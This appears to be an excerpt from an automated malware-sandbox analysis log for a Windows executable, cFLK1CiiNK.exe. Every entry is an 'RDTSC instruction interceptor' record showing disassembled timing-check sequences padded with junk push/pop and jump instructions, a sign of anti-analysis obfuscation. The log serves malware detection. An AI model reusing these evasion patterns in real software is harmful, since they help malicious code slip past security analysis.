                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D88E90 second address: D88E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8EE52 second address: D8EE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F612923D906h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8EE6B second address: D8EE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA78D7 second address: CA78DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0348 second address: 53E03A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007F61286B717Ch 0x00000012 call 00007F61286B7182h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 mov ebx, eax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F61286B717Ah 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F61286B717Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03A9 second address: 53E03AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03AD second address: 53E03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03B3 second address: 53E03B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03B9 second address: 53E03BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03BD second address: 53E03D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F612923D90Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400621 second address: 5400627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400627 second address: 5400646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F612923D911h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400646 second address: 54006EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F61286B7187h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov di, si 0x00000013 pushfd 0x00000014 jmp 00007F61286B717Ch 0x00000019 xor ah, 00000078h 0x0000001c jmp 00007F61286B717Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F61286B7186h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c movzx eax, bx 0x0000002f jmp 00007F61286B7183h 0x00000034 popad 0x00000035 xchg eax, ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop eax 0x0000003b pushfd 0x0000003c jmp 00007F61286B7187h 0x00000041 jmp 00007F61286B7183h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54006EC second address: 5400704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400704 second address: 5400708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400708 second address: 5400717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400717 second address: 540071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540071B second address: 5400721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400721 second address: 5400736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61286B7181h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400736 second address: 540073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540073A second address: 540076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F61286B7186h 0x00000012 adc ah, FFFFFFB8h 0x00000015 jmp 00007F61286B717Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540076E second address: 5400773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400773 second address: 5400779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400779 second address: 540077D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540077D second address: 54007C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F61286B717Ah 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 mov bh, al 0x00000014 mov dx, DC2Eh 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c pushad 0x0000001d push ebx 0x0000001e mov al, F3h 0x00000020 pop edi 0x00000021 jmp 00007F61286B7188h 0x00000026 popad 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push ebx 0x0000002e pop esi 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54007C5 second address: 54007D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D90Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54007D4 second address: 5400800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F61286B7184h 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F61286B717Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400800 second address: 5400806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54008E1 second address: 53F0022 instructions: 0x00000000 rdtsc 0x00000002 mov ch, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, al 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov edi, 7801BB54h 0x00000010 pushfd 0x00000011 jmp 00007F61286B717Dh 0x00000016 or eax, 47005616h 0x0000001c jmp 00007F61286B7181h 0x00000021 popfd 0x00000022 popad 0x00000023 leave 0x00000024 pushad 0x00000025 mov ax, 2623h 0x00000029 call 00007F61286B7188h 0x0000002e pushfd 0x0000002f jmp 00007F61286B7182h 0x00000034 add ch, FFFFFF98h 0x00000037 jmp 00007F61286B717Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f retn 0004h 0x00000042 nop 0x00000043 sub esp, 04h 0x00000046 xor ebx, ebx 0x00000048 cmp eax, 00000000h 0x0000004b je 00007F61286B72DAh 0x00000051 mov dword ptr [esp], 0000000Dh 0x00000058 call 00007F612CFD3311h 0x0000005d mov edi, edi 0x0000005f jmp 00007F61286B717Bh 0x00000064 xchg eax, ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F61286B7180h 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0022 second address: 53F0031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D90Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0031 second address: 53F0037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0037 second address: 53F003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F003B second address: 53F003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F003F second address: 53F0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov ch, dl 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0050 second address: 53F00CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov ch, 37h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F61286B717Bh 0x00000012 and esi, 6501D62Eh 0x00000018 jmp 00007F61286B7189h 0x0000001d popfd 0x0000001e jmp 00007F61286B7180h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F61286B7180h 0x0000002b sub esp, 2Ch 0x0000002e jmp 00007F61286B7180h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F61286B717Ah 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F00CD second address: 53F00D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F00D1 second address: 53F00D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F01AE second address: 53F01C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F01C6 second address: 53F01EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d jmp 00007F61286B717Ch 0x00000012 sub edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F61286B717Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F01EF second address: 53F021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov cx, EAD9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d inc ebx 0x0000000e pushad 0x0000000f jmp 00007F612923D912h 0x00000014 mov eax, 43E62B81h 0x00000019 popad 0x0000001a test al, al 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F021E second address: 53F0222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0222 second address: 53F0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0226 second address: 53F022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F022C second address: 53F0250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F612923DB38h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 mov dx, 680Ch 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F02F8 second address: 53F0332 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F61286B7183h 0x00000012 mov esi, 542D827Fh 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0332 second address: 53F0355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F612923D918h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0355 second address: 53F035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F035B second address: 53F035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F035F second address: 53F0363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0363 second address: 53F0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F612923D914h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F03C7 second address: 53F03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F03CB second address: 53F03E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F03E8 second address: 53F0407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 95h 0x00000005 mov dh, al 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F61286B71F6h 0x00000010 pushad 0x00000011 mov cl, dl 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0407 second address: 53F040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F040B second address: 53F040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F040F second address: 53F0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0415 second address: 53F04A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F61286B7186h 0x00000009 adc ah, FFFFFFA8h 0x0000000c jmp 00007F61286B717Bh 0x00000011 popfd 0x00000012 mov ch, 57h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jne 00007F6198D251CEh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F61286B7181h 0x00000024 sbb esi, 3C37C0C6h 0x0000002a jmp 00007F61286B7181h 0x0000002f popfd 0x00000030 mov di, si 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+08h] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov edx, 0CE8325Ah 0x0000003f pushfd 0x00000040 jmp 00007F61286B717Bh 0x00000045 jmp 00007F61286B7183h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F04A4 second address: 53F04AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E5BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F04AD second address: 53F051C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-2Ch] 0x0000000a jmp 00007F61286B7187h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F61286B717Bh 0x00000019 or al, FFFFFFBEh 0x0000001c jmp 00007F61286B7189h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F61286B7180h 0x00000028 sbb al, FFFFFFB8h 0x0000002b jmp 00007F61286B717Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F051C second address: 53F0571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F612923D917h 0x00000010 mov cx, 9CBFh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F612923D912h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0571 second address: 53F0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0575 second address: 53F0592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D919h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0592 second address: 53F05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F61286B7181h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05C0 second address: 53F05C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05C6 second address: 53F05E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05E3 second address: 53F05E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05E7 second address: 53F05EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05EB second address: 53F05F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F05F1 second address: 53F0610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0610 second address: 53F0614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0614 second address: 53F061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F061A second address: 53F0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D912h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0630 second address: 53F0634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0668 second address: 53F066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F066C second address: 53F0672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F0672 second address: 53F06A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 mov ebx, 6276AB30h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F612923D90Eh 0x0000001b and cl, 00000078h 0x0000001e jmp 00007F612923D90Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F06A6 second address: 53F06DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F61286B717Fh 0x00000008 pop ecx 0x00000009 jmp 00007F61286B7189h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test esi, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, ebx 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53F06DD second address: 53E0E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F61998AB873h 0x00000011 xor eax, eax 0x00000013 jmp 00007F612921703Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 sub esp, 04h 0x00000023 mov esi, eax 0x00000025 xor ebx, ebx 0x00000027 cmp esi, 00000000h 0x0000002a je 00007F612923DA45h 0x00000030 call 00007F612DB4A766h 0x00000035 mov edi, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov bl, al 0x0000003c mov ecx, ebx 0x0000003e popad 0x0000003f rdtsc
